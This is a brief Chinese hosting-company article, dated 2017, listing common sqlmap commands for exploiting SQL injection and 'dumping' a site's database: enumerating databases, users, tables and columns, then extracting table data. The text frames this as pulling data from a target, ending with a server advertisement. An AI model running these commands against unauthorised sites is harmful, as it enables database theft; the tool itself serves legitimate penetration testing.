新聞資訊
行業(yè)資訊
sqlmap實(shí)戰(zhàn)教程 SQLMAP注入拖庫(kù)常用命令
2017-12-15 17:25:03
摘要:SQLMAP是一款開源的滲透測(cè)試程序,它可以自動(dòng)探測(cè)和利用SQL注入漏洞來(lái)獲得我們想要的數(shù)據(jù)。我們可以利用它執(zhí)行特定的命令、查看文件、獲取各種數(shù)據(jù);當(dāng)然,最猥瑣的是它利用注入點(diǎn)拖庫(kù)的速率還是灰常讓人滿意的。

SQLMAP是一款開源的滲透測(cè)試程序,它可以自動(dòng)探測(cè)和利用SQL注入漏洞來(lái)獲得我們想要的數(shù)據(jù)。我們可以利用它執(zhí)行特定的命令、查看文件、獲取各種數(shù)據(jù);當(dāng)然,最猥瑣的是它利用注入點(diǎn)拖庫(kù)的速率還是灰常讓人滿意的。

#> ?./sqlmap.py -u “注入地址” -v 1 --dbs ? // 列舉數(shù)據(jù)庫(kù)?

#> ./sqlmap.py -u “注入地址” -v 1 --current-db ? // 當(dāng)前數(shù)據(jù)庫(kù)

#>./sqlmap.py -u “注入地址” -v 1 --users ? ?// 列數(shù)據(jù)庫(kù)用戶

#> ?./sqlmap.py -u “注入地址” -v 1 --current-user ?// 當(dāng)前用戶

#> ?./sqlmap.py -u “注入地址” -v 1 --tables -D “數(shù)據(jù)庫(kù)” ? // 列舉數(shù)據(jù)庫(kù)的表名

#> ./sqlmap.py -u “注入地址” -v 1 --columns -T “表名” -D “數(shù)據(jù)庫(kù)” ? // 獲取表的列名

#>./sqlmap.py -u “注入地址” -v 1 --dump -C “字段,字段” -T “表名” -D “數(shù)據(jù)庫(kù)” ? // 獲取表中的數(shù)據(jù),包含列?

已經(jīng)開始拖庫(kù)了,SQLMAP是非常人性化的,它會(huì)將獲取的數(shù)據(jù)存儲(chǔ)sqlmap/output/中

USA-IDC為您提供免備案服務(wù)器 0元試用
立即聯(lián)系在線客服,即可申請(qǐng)免費(fèi)產(chǎn)品試用服務(wù)
立即申請(qǐng)